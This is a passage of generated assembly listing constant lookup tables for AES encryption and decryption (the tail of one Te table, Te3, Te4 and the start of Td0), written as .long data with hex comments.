.long 1905517169 ## 0x7193e271
.long 3631459288 ## 0xd873abd8
.long 827548209 ## 0x31536231
.long 356461077 ## 0x153f2a15
.long 67897348 ## 0x40c0804
.long 3344078279 ## 0xc75295c7
.long 593839651 ## 0x23654623
.long 3277757891 ## 0xc35e9dc3
.long 405286936 ## 0x18283018
.long 2527147926 ## 0x96a13796
.long 84871685 ## 0x50f0a05
.long 2595565466 ## 0x9ab52f9a
.long 118033927 ## 0x7090e07
.long 305538066 ## 0x12362412
.long 2157648768 ## 0x809b1b80
.long 3795705826 ## 0xe23ddfe2
.long 3945188843 ## 0xeb26cdeb
.long 661212711 ## 0x27694e27
.long 2999812018 ## 0xb2cd7fb2
.long 1973414517 ## 0x759fea75
.long 152769033 ## 0x91b1209
.long 2208177539 ## 0x839e1d83
.long 745822252 ## 0x2c74582c
.long 439235610 ## 0x1a2e341a
.long 455947803 ## 0x1b2d361b
.long 1857215598 ## 0x6eb2dc6e
.long 1525593178 ## 0x5aeeb45a
.long 2700827552 ## 0xa0fb5ba0
.long 1391895634 ## 0x52f6a452
.long 994932283 ## 0x3b4d763b
.long 3596728278 ## 0xd661b7d6
.long 3016654259 ## 0xb3ce7db3
.long 695947817 ## 0x297b5229
.long 3812548067 ## 0xe33edde3
.long 795958831 ## 0x2f715e2f
.long 2224493444 ## 0x84971384
.long 1408607827 ## 0x53f5a653
.long 3513301457 ## 0xd168b9d1
.long 0 ## 0x0
.long 3979133421 ## 0xed2cc1ed
.long 543178784 ## 0x20604020
.long 4229948412 ## 0xfc1fe3fc
.long 2982705585 ## 0xb1c879b1
.long 1542305371 ## 0x5bedb65b
.long 1790891114 ## 0x6abed46a
.long 3410398667 ## 0xcb468dcb
.long 3201918910 ## 0xbed967be
.long 961245753 ## 0x394b7239
.long 1256100938 ## 0x4ade944a
.long 1289001036 ## 0x4cd4984c
.long 1491644504 ## 0x58e8b058
.long 3477767631 ## 0xcf4a85cf
.long 3496721360 ## 0xd06bbbd0
.long 4012557807 ## 0xef2ac5ef
.long 2867154858 ## 0xaae54faa
.long 4212583931 ## 0xfb16edfb
.long 1137018435 ## 0x43c58643
.long 1305975373 ## 0x4dd79a4d
.long 861234739 ## 0x33556633
.long 2241073541 ## 0x85941185
.long 1171229253 ## 0x45cf8a45
.long 4178635257 ## 0xf910e9f9
.long 33948674 ## 0x2060402
.long 2139225727 ## 0x7f81fe7f
.long 1357946960 ## 0x50f0a050
.long 1011120188 ## 0x3c44783c
.long 2679776671 ## 0x9fba259f
.long 2833468328 ## 0xa8e34ba8
.long 1374921297 ## 0x51f3a251
.long 2751356323 ## 0xa3fe5da3
.long 1086357568 ## 0x40c08040
.long 2408187279 ## 0x8f8a058f
.long 2460827538 ## 0x92ad3f92
.long 2646352285 ## 0x9dbc219d
.long 944271416 ## 0x38487038
.long 4110742005 ## 0xf504f1f5
.long 3168756668 ## 0xbcdf63bc
.long 3066132406 ## 0xb6c177b6
.long 3665145818 ## 0xda75afda
.long 560153121 ## 0x21634221
.long 271589392 ## 0x10302010
.long 4279952895 ## 0xff1ae5ff
.long 4077846003 ## 0xf30efdf3
.long 3530407890 ## 0xd26dbfd2
.long 3444343245 ## 0xcd4c81cd
.long 202643468 ## 0xc14180c
.long 322250259 ## 0x13352613
.long 3962553324 ## 0xec2fc3ec
.long 1608629855 ## 0x5fe1be5f
.long 2543990167 ## 0x97a23597
.long 1154254916 ## 0x44cc8844
.long 389623319 ## 0x17392e17
.long 3294073796 ## 0xc45793c4
.long 2817676711 ## 0xa7f255a7
.long 2122513534 ## 0x7e82fc7e
.long 1028094525 ## 0x3d477a3d
.long 1689045092 ## 0x64acc864
.long 1575467613 ## 0x5de7ba5d
.long 422261273 ## 0x192b3219
.long 1939203699 ## 0x7395e673
.long 1621147744 ## 0x60a0c060
.long 2174228865 ## 0x81981981
.long 1339137615 ## 0x4fd19e4f
.long 3699352540 ## 0xdc7fa3dc
.long 577127458 ## 0x22664422
.long 712922154 ## 0x2a7e542a
.long 2427141008 ## 0x90ab3b90
.long 2290289544 ## 0x88830b88
.long 1187679302 ## 0x46ca8c46
.long 3995715566 ## 0xee29c7ee
.long 3100863416 ## 0xb8d36bb8
.long 339486740 ## 0x143c2814
.long 3732514782 ## 0xde79a7de
.long 1591917662 ## 0x5ee2bc5e
.long 186455563 ## 0xb1d160b
.long 3681988059 ## 0xdb76addb
.long 3762019296 ## 0xe03bdbe0
.long 844522546 ## 0x32566432
.long 978220090 ## 0x3a4e743a
.long 169743370 ## 0xa1e140a
.long 1239126601 ## 0x49db9249
.long 101321734 ## 0x60a0c06
.long 611076132 ## 0x246c4824
.long 1558493276 ## 0x5ce4b85c
.long 3260915650 ## 0xc25d9fc2
.long 3547250131 ## 0xd36ebdd3
.long 2901361580 ## 0xacef43ac
.long 1655096418 ## 0x62a6c462
.long 2443721105 ## 0x91a83991
.long 2510565781 ## 0x95a43195
.long 3828863972 ## 0xe437d3e4
.long 2039214713 ## 0x798bf279
.long 3878868455 ## 0xe732d5e7
.long 3359869896 ## 0xc8438bc8
.long 928607799 ## 0x37596e37
.long 1840765549 ## 0x6db7da6d
.long 2374762893 ## 0x8d8c018d
.long 3580146133 ## 0xd564b1d5
.long 1322425422 ## 0x4ed29c4e
.long 2850048425 ## 0xa9e049a9
.long 1823791212 ## 0x6cb4d86c
.long 1459268694 ## 0x56faac56
.long 4094161908 ## 0xf407f3f4
.long 3928346602 ## 0xea25cfea
.long 1706019429 ## 0x65afca65
.long 2056189050 ## 0x7a8ef47a
.long 2934523822 ## 0xaee947ae
.long 135794696 ## 0x8181008
.long 3134549946 ## 0xbad56fba
.long 2022240376 ## 0x7888f078
.long 628050469 ## 0x256f4a25
.long 779246638 ## 0x2e725c2e
.long 472135708 ## 0x1c24381c
.long 2800834470 ## 0xa6f157a6
.long 3032970164 ## 0xb4c773b4
.long 3327236038 ## 0xc65197c6
.long 3894660072 ## 0xe823cbe8
.long 3715932637 ## 0xdd7ca1dd
.long 1956440180 ## 0x749ce874
.long 522272287 ## 0x1f213e1f
.long 1272813131 ## 0x4bdd964b
.long 3185336765 ## 0xbddc61bd
.long 2340818315 ## 0x8b860d8b
.long 2323976074 ## 0x8a850f8a
.long 1888542832 ## 0x7090e070
.long 1044544574 ## 0x3e427c3e
.long 3049550261 ## 0xb5c471b5
.long 1722469478 ## 0x66aacc66
.long 1222152264 ## 0x48d89048
.long 50660867 ## 0x3050603
.long 4127324150 ## 0xf601f7f6
.long 236067854 ## 0xe121c0e
.long 1638122081 ## 0x61a3c261
.long 895445557 ## 0x355f6a35
.long 1475980887 ## 0x57f9ae57
.long 3117443513 ## 0xb9d069b9
.long 2257655686 ## 0x86911786
.long 3243809217 ## 0xc15899c1
.long 489110045 ## 0x1d273a1d
.long 2662934430 ## 0x9eb9279e
.long 3778599393 ## 0xe138d9e1
.long 4162055160 ## 0xf813ebf8
.long 2561878936 ## 0x98b32b98
.long 288563729 ## 0x11332211
.long 1773916777 ## 0x69bbd269
.long 3648039385 ## 0xd970a9d9
.long 2391345038 ## 0x8e89078e
.long 2493985684 ## 0x94a73394
.long 2612407707 ## 0x9bb62d9b
.long 505560094 ## 0x1e223c1e
.long 2274497927 ## 0x87921587
.long 3911240169 ## 0xe920c9e9
.long 3460925390 ## 0xce4987ce
.long 1442818645 ## 0x55ffaa55
.long 678973480 ## 0x28785028
.long 3749357023 ## 0xdf7aa5df
.long 2358182796 ## 0x8c8f038c
.long 2717407649 ## 0xa1f859a1
.long 2306869641 ## 0x89800989
.long 219617805 ## 0xd171a0d
.long 3218761151 ## 0xbfda65bf
.long 3862026214 ## 0xe631d7e6
.long 1120306242 ## 0x42c68442
.long 1756942440 ## 0x68b8d068
.long 1103331905 ## 0x41c38241
.long 2578459033 ## 0x99b02999
.long 762796589 ## 0x2d775a2d
.long 252780047 ## 0xf111e0f
.long 2966125488 ## 0xb0cb7bb0
.long 1425844308 ## 0x54fca854
.long 3151392187 ## 0xbbd66dbb
.long 372911126 ## 0x163a2c16
.p2align 4 ## @Te3
_Te3:
.long 1667474886 ## 0x6363a5c6
.long 2088535288 ## 0x7c7c84f8
.long 2004326894 ## 0x777799ee
.long 2071694838 ## 0x7b7b8df6
.long 4075949567 ## 0xf2f20dff
.long 1802223062 ## 0x6b6bbdd6
.long 1869591006 ## 0x6f6fb1de
.long 3318043793 ## 0xc5c55491
.long 808472672 ## 0x30305060
.long 16843522 ## 0x1010302
.long 1734846926 ## 0x6767a9ce
.long 724270422 ## 0x2b2b7d56
.long 4278065639 ## 0xfefe19e7
.long 3621216949 ## 0xd7d762b5
.long 2880169549 ## 0xababe64d
.long 1987484396 ## 0x76769aec
.long 3402253711 ## 0xcaca458f
.long 2189597983 ## 0x82829d1f
.long 3385409673 ## 0xc9c94089
.long 2105378810 ## 0x7d7d87fa
.long 4210693615 ## 0xfafa15ef
.long 1499065266 ## 0x5959ebb2
.long 1195886990 ## 0x4747c98e
.long 4042263547 ## 0xf0f00bfb
.long 2913856577 ## 0xadadec41
.long 3570689971 ## 0xd4d467b3
.long 2728590687 ## 0xa2a2fd5f
.long 2947541573 ## 0xafafea45
.long 2627518243 ## 0x9c9cbf23
.long 2762274643 ## 0xa4a4f753
.long 1920112356 ## 0x727296e4
.long 3233831835 ## 0xc0c05b9b
.long 3082273397 ## 0xb7b7c275
.long 4261223649 ## 0xfdfd1ce1
.long 2475929149 ## 0x9393ae3d
.long 640051788 ## 0x26266a4c
.long 909531756 ## 0x36365a6c
.long 1061110142 ## 0x3f3f417e
.long 4160160501 ## 0xf7f702f5
.long 3435941763 ## 0xcccc4f83
.long 875846760 ## 0x34345c68
.long 2779116625 ## 0xa5a5f451
.long 3857003729 ## 0xe5e534d1
.long 4059105529 ## 0xf1f108f9
.long 1903268834 ## 0x717193e2
.long 3638064043 ## 0xd8d873ab
.long 825316194 ## 0x31315362
.long 353713962 ## 0x15153f2a
.long 67374088 ## 0x4040c08
.long 3351728789 ## 0xc7c75295
.long 589522246 ## 0x23236546
.long 3284360861 ## 0xc3c35e9d
.long 404236336 ## 0x18182830
.long 2526454071 ## 0x9696a137
.long 84217610 ## 0x5050f0a
.long 2593830191 ## 0x9a9ab52f
.long 117901582 ## 0x707090e
.long 303183396 ## 0x12123624
.long 2155911963 ## 0x80809b1b
.long 3806477791 ## 0xe2e23ddf
.long 3958056653 ## 0xebeb26cd
.long 656894286 ## 0x2727694e
.long 2998062463 ## 0xb2b2cd7f
.long 1970642922 ## 0x75759fea
.long 151591698 ## 0x9091b12
.long 2206440989 ## 0x83839e1d
.long 741110872 ## 0x2c2c7458
.long 437923380 ## 0x1a1a2e34
.long 454765878 ## 0x1b1b2d36
.long 1852748508 ## 0x6e6eb2dc
.long 1515908788 ## 0x5a5aeeb4
.long 2694904667 ## 0xa0a0fb5b
.long 1381168804 ## 0x5252f6a4
.long 993742198 ## 0x3b3b4d76
.long 3604373943 ## 0xd6d661b7
.long 3014905469 ## 0xb3b3ce7d
.long 690584402 ## 0x29297b52
.long 3823320797 ## 0xe3e33edd
.long 791638366 ## 0x2f2f715e
.long 2223281939 ## 0x84849713
.long 1398011302 ## 0x5353f5a6
.long 3520161977 ## 0xd1d168b9
.long 0 ## 0x0
.long 3991743681 ## 0xeded2cc1
.long 538992704 ## 0x20206040
.long 4244381667 ## 0xfcfc1fe3
.long 2981218425 ## 0xb1b1c879
.long 1532751286 ## 0x5b5bedb6
.long 1785380564 ## 0x6a6abed4
.long 3419096717 ## 0xcbcb468d
.long 3200178535 ## 0xbebed967
.long 960056178 ## 0x39394b72
.long 1246420628 ## 0x4a4ade94
.long 1280103576 ## 0x4c4cd498
.long 1482221744 ## 0x5858e8b0
.long 3486468741 ## 0xcfcf4a85
.long 3503319995 ## 0xd0d06bbb
.long 4025428677 ## 0xefef2ac5
.long 2863326543 ## 0xaaaae54f
.long 4227536621 ## 0xfbfb16ed
.long 1128514950 ## 0x4343c586
.long 1296947098 ## 0x4d4dd79a
.long 859002214 ## 0x33335566
.long 2240123921 ## 0x85859411
.long 1162203018 ## 0x4545cf8a
.long 4193849577 ## 0xf9f910e9
.long 33687044 ## 0x2020604
.long 2139062782 ## 0x7f7f81fe
.long 1347481760 ## 0x5050f0a0
.long 1010582648 ## 0x3c3c4478
.long 2678045221 ## 0x9f9fba25
.long 2829640523 ## 0xa8a8e34b
.long 1364325282 ## 0x5151f3a2
.long 2745433693 ## 0xa3a3fe5d
.long 1077985408 ## 0x4040c080
.long 2408548869 ## 0x8f8f8a05
.long 2459086143 ## 0x9292ad3f
.long 2644360225 ## 0x9d9dbc21
.long 943212656 ## 0x38384870
.long 4126475505 ## 0xf5f504f1
.long 3166494563 ## 0xbcbcdf63
.long 3065430391 ## 0xb6b6c177
.long 3671750063 ## 0xdada75af
.long 555836226 ## 0x21216342
.long 269496352 ## 0x10103020
.long 4294908645 ## 0xffff1ae5
.long 4092792573 ## 0xf3f30efd
.long 3537006015 ## 0xd2d26dbf
.long 3452783745 ## 0xcdcd4c81
.long 202118168 ## 0xc0c1418
.long 320025894 ## 0x13133526
.long 3974901699 ## 0xecec2fc3
.long 1600119230 ## 0x5f5fe1be
.long 2543297077 ## 0x9797a235
.long 1145359496 ## 0x4444cc88
.long 387397934 ## 0x1717392e
.long 3301201811 ## 0xc4c45793
.long 2812801621 ## 0xa7a7f255
.long 2122220284 ## 0x7e7e82fc
.long 1027426170 ## 0x3d3d477a
.long 1684319432 ## 0x6464acc8
.long 1566435258 ## 0x5d5de7ba
.long 421079858 ## 0x19192b32
.long 1936954854 ## 0x737395e6
.long 1616945344 ## 0x6060a0c0
.long 2172753945 ## 0x81819819
.long 1330631070 ## 0x4f4fd19e
.long 3705438115 ## 0xdcdc7fa3
.long 572679748 ## 0x22226644
.long 707427924 ## 0x2a2a7e54
.long 2425400123 ## 0x9090ab3b
.long 2290647819 ## 0x8888830b
.long 1179044492 ## 0x4646ca8c
.long 4008585671 ## 0xeeee29c7
.long 3099120491 ## 0xb8b8d36b
.long 336870440 ## 0x14143c28
.long 3739122087 ## 0xdede79a7
.long 1583276732 ## 0x5e5ee2bc
.long 185277718 ## 0xb0b1d16
.long 3688593069 ## 0xdbdb76ad
.long 3772791771 ## 0xe0e03bdb
.long 842159716 ## 0x32325664
.long 976899700 ## 0x3a3a4e74
.long 168435220 ## 0xa0a1e14
.long 1229577106 ## 0x4949db92
.long 101059084 ## 0x6060a0c
.long 606366792 ## 0x24246c48
.long 1549591736 ## 0x5c5ce4b8
.long 3267517855 ## 0xc2c25d9f
.long 3553849021 ## 0xd3d36ebd
.long 2897014595 ## 0xacacef43
.long 1650632388 ## 0x6262a6c4
.long 2442242105 ## 0x9191a839
.long 2509612081 ## 0x9595a431
.long 3840161747 ## 0xe4e437d3
.long 2038008818 ## 0x79798bf2
.long 3890688725 ## 0xe7e732d5
.long 3368567691 ## 0xc8c8438b
.long 926374254 ## 0x3737596e
.long 1835907034 ## 0x6d6db7da
.long 2374863873 ## 0x8d8d8c01
.long 3587531953 ## 0xd5d564b1
.long 1313788572 ## 0x4e4ed29c
.long 2846482505 ## 0xa9a9e049
.long 1819063512 ## 0x6c6cb4d8
.long 1448540844 ## 0x5656faac
.long 4109633523 ## 0xf4f407f3
.long 3941213647 ## 0xeaea25cf
.long 1701162954 ## 0x6565afca
.long 2054852340 ## 0x7a7a8ef4
.long 2930698567 ## 0xaeaee947
.long 134748176 ## 0x8081810
.long 3132806511 ## 0xbabad56f
.long 2021165296 ## 0x787888f0
.long 623210314 ## 0x25256f4a
.long 774795868 ## 0x2e2e725c
.long 471606328 ## 0x1c1c2438
.long 2795958615 ## 0xa6a6f157
.long 3031746419 ## 0xb4b4c773
.long 3334885783 ## 0xc6c65197
.long 3907527627 ## 0xe8e823cb
.long 3722280097 ## 0xdddd7ca1
.long 1953799400 ## 0x74749ce8
.long 522133822 ## 0x1f1f213e
.long 1263263126 ## 0x4b4bdd96
.long 3183336545 ## 0xbdbddc61
.long 2341176845 ## 0x8b8b860d
.long 2324333839 ## 0x8a8a850f
.long 1886425312 ## 0x707090e0
.long 1044267644 ## 0x3e3e427c
.long 3048588401 ## 0xb5b5c471
.long 1718004428 ## 0x6666aacc
.long 1212733584 ## 0x4848d890
.long 50529542 ## 0x3030506
.long 4143317495 ## 0xf6f601f7
.long 235803164 ## 0xe0e121c
.long 1633788866 ## 0x6161a3c2
.long 892690282 ## 0x35355f6a
.long 1465383342 ## 0x5757f9ae
.long 3115962473 ## 0xb9b9d069
.long 2256965911 ## 0x86869117
.long 3250673817 ## 0xc1c15899
.long 488449850 ## 0x1d1d273a
.long 2661202215 ## 0x9e9eb927
.long 3789633753 ## 0xe1e138d9
.long 4177007595 ## 0xf8f813eb
.long 2560144171 ## 0x9898b32b
.long 286339874 ## 0x11113322
.long 1768537042 ## 0x6969bbd2
.long 3654906025 ## 0xd9d970a9
.long 2391705863 ## 0x8e8e8907
.long 2492770099 ## 0x9494a733
.long 2610673197 ## 0x9b9bb62d
.long 505291324 ## 0x1e1e223c
.long 2273808917 ## 0x87879215
.long 3924369609 ## 0xe9e920c9
.long 3469625735 ## 0xcece4987
.long 1431699370 ## 0x5555ffaa
.long 673740880 ## 0x28287850
.long 3755965093 ## 0xdfdf7aa5
.long 2358021891 ## 0x8c8c8f03
.long 2711746649 ## 0xa1a1f859
.long 2307489801 ## 0x89898009
.long 218961690 ## 0xd0d171a
.long 3217021541 ## 0xbfbfda65
.long 3873845719 ## 0xe6e631d7
.long 1111672452 ## 0x4242c684
.long 1751693520 ## 0x6868b8d0
.long 1094828930 ## 0x4141c382
.long 2576986153 ## 0x9999b029
.long 757954394 ## 0x2d2d775a
.long 252645662 ## 0xf0f111e
.long 2964376443 ## 0xb0b0cb7b
.long 1414855848 ## 0x5454fca8
.long 3149649517 ## 0xbbbbd66d
.long 370555436 ## 0x16163a2c
.p2align 4 ## @Te4
_Te4:
.long 1667457891 ## 0x63636363
.long 2088533116 ## 0x7c7c7c7c
.long 2004318071 ## 0x77777777
.long 2071690107 ## 0x7b7b7b7b
.long 4076008178 ## 0xf2f2f2f2
.long 1802201963 ## 0x6b6b6b6b
.long 1869573999 ## 0x6f6f6f6f
.long 3318072773 ## 0xc5c5c5c5
.long 808464432 ## 0x30303030
.long 16843009 ## 0x1010101
.long 1734829927 ## 0x67676767
.long 724249387 ## 0x2b2b2b2b
.long 4278124286 ## 0xfefefefe
.long 3621246935 ## 0xd7d7d7d7
.long 2880154539 ## 0xabababab
.long 1987475062 ## 0x76767676
.long 3402287818 ## 0xcacacaca
.long 2189591170 ## 0x82828282
.long 3385444809 ## 0xc9c9c9c9
.long 2105376125 ## 0x7d7d7d7d
.long 4210752250 ## 0xfafafafa
.long 1499027801 ## 0x59595959
.long 1195853639 ## 0x47474747
.long 4042322160 ## 0xf0f0f0f0
.long 2913840557 ## 0xadadadad
.long 3570717908 ## 0xd4d4d4d4
.long 2728567458 ## 0xa2a2a2a2
.long 2947526575 ## 0xafafafaf
.long 2627509404 ## 0x9c9c9c9c
.long 2762253476 ## 0xa4a4a4a4
.long 1920103026 ## 0x72727272
.long 3233857728 ## 0xc0c0c0c0
.long 3082270647 ## 0xb7b7b7b7
.long 4261281277 ## 0xfdfdfdfd
.long 2475922323 ## 0x93939393
.long 640034342 ## 0x26262626
.long 909522486 ## 0x36363636
.long 1061109567 ## 0x3f3f3f3f
.long 4160223223 ## 0xf7f7f7f7
.long 3435973836 ## 0xcccccccc
.long 875836468 ## 0x34343434
.long 2779096485 ## 0xa5a5a5a5
.long 3857049061 ## 0xe5e5e5e5
.long 4059165169 ## 0xf1f1f1f1
.long 1903260017 ## 0x71717171
.long 3638089944 ## 0xd8d8d8d8
.long 825307441 ## 0x31313131
.long 353703189 ## 0x15151515
.long 67372036 ## 0x4040404
.long 3351758791 ## 0xc7c7c7c7
.long 589505315 ## 0x23232323
.long 3284386755 ## 0xc3c3c3c3
.long 404232216 ## 0x18181818
.long 2526451350 ## 0x96969696
.long 84215045 ## 0x5050505
.long 2593823386 ## 0x9a9a9a9a
.long 117901063 ## 0x7070707
.long 303174162 ## 0x12121212
.long 2155905152 ## 0x80808080
.long 3806520034 ## 0xe2e2e2e2
.long 3958107115 ## 0xebebebeb
.long 656877351 ## 0x27272727
.long 2998055602 ## 0xb2b2b2b2
.long 1970632053 ## 0x75757575
.long 151587081 ## 0x9090909
.long 2206434179 ## 0x83838383
.long 741092396 ## 0x2c2c2c2c
.long 437918234 ## 0x1a1a1a1a
.long 454761243 ## 0x1b1b1b1b
.long 1852730990 ## 0x6e6e6e6e
.long 1515870810 ## 0x5a5a5a5a
.long 2694881440 ## 0xa0a0a0a0
.long 1381126738 ## 0x52525252
.long 993737531 ## 0x3b3b3b3b
.long 3604403926 ## 0xd6d6d6d6
.long 3014898611 ## 0xb3b3b3b3
.long 690563369 ## 0x29292929
.long 3823363043 ## 0xe3e3e3e3
.long 791621423 ## 0x2f2f2f2f
.long 2223277188 ## 0x84848484
.long 1397969747 ## 0x53535353
.long 3520188881 ## 0xd1d1d1d1
.long 0 ## 0x0
.long 3991793133 ## 0xedededed
.long 538976288 ## 0x20202020
.long 4244438268 ## 0xfcfcfcfc
.long 2981212593 ## 0xb1b1b1b1
.long 1532713819 ## 0x5b5b5b5b
.long 1785358954 ## 0x6a6a6a6a
.long 3419130827 ## 0xcbcbcbcb
.long 3200171710 ## 0xbebebebe
.long 960051513 ## 0x39393939
.long 1246382666 ## 0x4a4a4a4a
.long 1280068684 ## 0x4c4c4c4c
.long 1482184792 ## 0x58585858
.long 3486502863 ## 0xcfcfcfcf
.long 3503345872 ## 0xd0d0d0d0
.long 4025479151 ## 0xefefefef
.long 2863311530 ## 0xaaaaaaaa
.long 4227595259 ## 0xfbfbfbfb
.long 1128481603 ## 0x43434343
.long 1296911693 ## 0x4d4d4d4d
.long 858993459 ## 0x33333333
.long 2240120197 ## 0x85858585
.long 1162167621 ## 0x45454545
.long 4193909241 ## 0xf9f9f9f9
.long 33686018 ## 0x2020202
.long 2139062143 ## 0x7f7f7f7f
.long 1347440720 ## 0x50505050
.long 1010580540 ## 0x3c3c3c3c
.long 2678038431 ## 0x9f9f9f9f
.long 2829625512 ## 0xa8a8a8a8
.long 1364283729 ## 0x51515151
.long 2745410467 ## 0xa3a3a3a3
.long 1077952576 ## 0x40404040
.long 2408550287 ## 0x8f8f8f8f
.long 2459079314 ## 0x92929292
.long 2644352413 ## 0x9d9d9d9d
.long 943208504 ## 0x38383838
.long 4126537205 ## 0xf5f5f5f5
.long 3166485692 ## 0xbcbcbcbc
.long 3065427638 ## 0xb6b6b6b6
.long 3671775962 ## 0xdadadada
.long 555819297 ## 0x21212121
.long 269488144 ## 0x10101010
.long 4294967295 ## 0xffffffff
.long 4092851187 ## 0xf3f3f3f3
.long 3537031890 ## 0xd2d2d2d2
.long 3452816845 ## 0xcdcdcdcd
.long 202116108 ## 0xc0c0c0c
.long 320017171 ## 0x13131313
.long 3974950124 ## 0xecececec
.long 1600085855 ## 0x5f5f5f5f
.long 2543294359 ## 0x97979797
.long 1145324612 ## 0x44444444
.long 387389207 ## 0x17171717
.long 3301229764 ## 0xc4c4c4c4
.long 2812782503 ## 0xa7a7a7a7
.long 2122219134 ## 0x7e7e7e7e
.long 1027423549 ## 0x3d3d3d3d
.long 1684300900 ## 0x64646464
.long 1566399837 ## 0x5d5d5d5d
.long 421075225 ## 0x19191919
.long 1936946035 ## 0x73737373
.long 1616928864 ## 0x60606060
.long 2172748161 ## 0x81818181
.long 1330597711 ## 0x4f4f4f4f
.long 3705461980 ## 0xdcdcdcdc
.long 572662306 ## 0x22222222
.long 707406378 ## 0x2a2a2a2a
.long 2425393296 ## 0x90909090
.long 2290649224 ## 0x88888888
.long 1179010630 ## 0x46464646
.long 4008636142 ## 0xeeeeeeee
.long 3099113656 ## 0xb8b8b8b8
.long 336860180 ## 0x14141414
.long 3739147998 ## 0xdededede
.long 1583242846 ## 0x5e5e5e5e
.long 185273099 ## 0xb0b0b0b
.long 3688618971 ## 0xdbdbdbdb
.long 3772834016 ## 0xe0e0e0e0
.long 842150450 ## 0x32323232
.long 976894522 ## 0x3a3a3a3a
.long 168430090 ## 0xa0a0a0a
.long 1229539657 ## 0x49494949
.long 101058054 ## 0x6060606
.long 606348324 ## 0x24242424
.long 1549556828 ## 0x5c5c5c5c
.long 3267543746 ## 0xc2c2c2c2
.long 3553874899 ## 0xd3d3d3d3
.long 2896997548 ## 0xacacacac
.long 1650614882 ## 0x62626262
.long 2442236305 ## 0x91919191
.long 2509608341 ## 0x95959595
.long 3840206052 ## 0xe4e4e4e4
.long 2038004089 ## 0x79797979
.long 3890735079 ## 0xe7e7e7e7
.long 3368601800 ## 0xc8c8c8c8
.long 926365495 ## 0x37373737
.long 1835887981 ## 0x6d6d6d6d
.long 2374864269 ## 0x8d8d8d8d
.long 3587560917 ## 0xd5d5d5d5
.long 1313754702 ## 0x4e4e4e4e
.long 2846468521 ## 0xa9a9a9a9
.long 1819044972 ## 0x6c6c6c6c
.long 1448498774 ## 0x56565656
.long 4109694196 ## 0xf4f4f4f4
.long 3941264106 ## 0xeaeaeaea
.long 1701143909 ## 0x65656565
.long 2054847098 ## 0x7a7a7a7a
.long 2930683566 ## 0xaeaeaeae
.long 134744072 ## 0x8080808
.long 3132799674 ## 0xbabababa
.long 2021161080 ## 0x78787878
.long 623191333 ## 0x25252525
.long 774778414 ## 0x2e2e2e2e
.long 471604252 ## 0x1c1c1c1c
.long 2795939494 ## 0xa6a6a6a6
.long 3031741620 ## 0xb4b4b4b4
.long 3334915782 ## 0xc6c6c6c6
.long 3907578088 ## 0xe8e8e8e8
.long 3722304989 ## 0xdddddddd
.long 1953789044 ## 0x74747474
.long 522133279 ## 0x1f1f1f1f
.long 1263225675 ## 0x4b4b4b4b
.long 3183328701 ## 0xbdbdbdbd
.long 2341178251 ## 0x8b8b8b8b
.long 2324335242 ## 0x8a8a8a8a
.long 1886417008 ## 0x70707070
.long 1044266558 ## 0x3e3e3e3e
.long 3048584629 ## 0xb5b5b5b5
.long 1717986918 ## 0x66666666
.long 1212696648 ## 0x48484848
.long 50529027 ## 0x3030303
.long 4143380214 ## 0xf6f6f6f6
.long 235802126 ## 0xe0e0e0e
.long 1633771873 ## 0x61616161
.long 892679477 ## 0x35353535
.long 1465341783 ## 0x57575757
.long 3115956665 ## 0xb9b9b9b9
.long 2256963206 ## 0x86868686
.long 3250700737 ## 0xc1c1c1c1
.long 488447261 ## 0x1d1d1d1d
.long 2661195422 ## 0x9e9e9e9e
.long 3789677025 ## 0xe1e1e1e1
.long 4177066232 ## 0xf8f8f8f8
.long 2560137368 ## 0x98989898
.long 286331153 ## 0x11111111
.long 1768515945 ## 0x69696969
.long 3654932953 ## 0xd9d9d9d9
.long 2391707278 ## 0x8e8e8e8e
.long 2492765332 ## 0x94949494
.long 2610666395 ## 0x9b9b9b9b
.long 505290270 ## 0x1e1e1e1e
.long 2273806215 ## 0x87878787
.long 3924421097 ## 0xe9e9e9e9
.long 3469659854 ## 0xcececece
.long 1431655765 ## 0x55555555
.long 673720360 ## 0x28282828
.long 3755991007 ## 0xdfdfdfdf
.long 2358021260 ## 0x8c8c8c8c
.long 2711724449 ## 0xa1a1a1a1
.long 2307492233 ## 0x89898989
.long 218959117 ## 0xd0d0d0d
.long 3217014719 ## 0xbfbfbfbf
.long 3873892070 ## 0xe6e6e6e6
.long 1111638594 ## 0x42424242
.long 1751672936 ## 0x68686868
.long 1094795585 ## 0x41414141
.long 2576980377 ## 0x99999999
.long 757935405 ## 0x2d2d2d2d
.long 252645135 ## 0xf0f0f0f
.long 2964369584 ## 0xb0b0b0b0
.long 1414812756 ## 0x54545454
.long 3149642683 ## 0xbbbbbbbb
.long 370546198 ## 0x16161616
.p2align 4 ## @Td0
_Td0:
.long 1374988112 ## 0x51f4a750
.long 2118214995 ## 0x7e416553
.long 437757123 ## 0x1a17a4c3
.long 975658646 ## 0x3a275e96
.long 1001089995 ## 0x3bab6bcb
.long 530400753 ## 0x1f9d45f1
.long 2902087851 ## 0xacfa58ab
.long 1273168787 ## 0x4be30393
.long 540080725 ## 0x2030fa55
.long 2910219766 ## 0xad766df6
.long 2295101073 ## 0x88cc7691
.long 4110568485 ## 0xf5024c25
.long 1340463100 ## 0x4fe5d7fc
.long 3307916247 ## 0xc52acbd7
.long 641025152 ## 0x26354480
.long 3043140495 ## 0xb562a38f
.long 3736164937 ## 0xdeb15a49
.long 632953703 ## 0x25ba1b67
.long 1172967064 ## 0x45ea0e98
.long 1576976609 ## 0x5dfec0e1
.long 3274667266 ## 0xc32f7502
.long 2169303058 ## 0x814cf012
.long 2370213795 ## 0x8d4697a3
.long 1809054150 ## 0x6bd3f9c6
.long 59727847 ## 0x38f5fe7
.long 361929877 ## 0x15929c95
.long 3211623147 ## 0xbf6d7aeb
.long 2505202138 ## 0x955259da
.long 3569255213 ## 0xd4be832d
.long 1484005843 ## 0x587421d3
.long 1239443753 ## 0x49e06929
.long 2395588676 ## 0x8ec9c844
.long 1975683434 ## 0x75c2896a
.long 4102977912 ## 0xf48e7978
.long 2572697195 ## 0x99583e6b
.long 666464733 ## 0x27b971dd
.long 3202437046 ## 0xbee14fb6
.long 4035489047 ## 0xf088ad17
.long 3374361702 ## 0xc920ac66
.long 2110667444 ## 0x7dce3ab4
.long 1675577880 ## 0x63df4a18
.long 3843699074 ## 0xe51a3182
.long 2538681184 ## 0x97513360
.long 1649639237 ## 0x62537f45
.long 2976151520 ## 0xb16477e0
.long 3144396420 ## 0xbb6bae84
.long 4269907996 ## 0xfe81a01c
.long 4178062228 ## 0xf9082b94
.long 1883793496 ## 0x70486858
.long 2403728665 ## 0x8f45fd19
.long 2497604743 ## 0x94de6c87
